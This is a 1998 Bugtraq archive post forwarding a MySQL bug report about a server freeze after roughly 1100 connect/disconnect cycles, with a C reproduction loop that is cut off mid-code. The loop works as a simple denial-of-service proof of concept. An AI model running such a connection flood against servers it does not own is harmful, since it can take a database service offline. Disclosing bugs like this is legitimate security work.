Bugtraq mailing list archives

MySQL DoS ?

From: patrick () cookie monster org (Phear Me)
Date: Sat, 15 Aug 1998 03:15:49 +0200

This appeared at the MySQL list:

Date: Fri, 14 Aug 1998 18:50:02 +0200
From: Jochen Wiedmann <joe () ispsoft de>
Subject: mysql: Connecting/Disconnecting 1100 times freezes server

Date: Fri, 14 Aug 1998 18:42:55 +0200
Full-Name: root
From: joe
To: mysql () tcx se

        A simple test script that connects/disconnects in an endless
        loop makes the MySQL server freeze after approximately 1100
        iterations.

        Is this a bug or a security related feature? If the latter,
        can I turn it off somehow, as it prevents me from
        investigating a memory leak in the DBD::mysql's connect
        method.

How-To-Repeat:

        #include <stdlib.h>
        #include <string.h>
        #include <stdio.h>
        #include <mysql/mysql.h>

        int main(int argc, char* argv[]) {
            MYSQL sock;
            int i = 0;

            while (1) {
                if (++i % 100 == 0) {
                    printf("%d\n", i);
                }
                mysql_init(&sock);
                if (!mysql_real_connect(&sock, NULL, NULL, NULL, NULL,
                                        0, NULL, 0)) {
                    fprintf(stderr, "Cannot connect: %s\n",
                            mysql_error(&sock));
                    exit(10);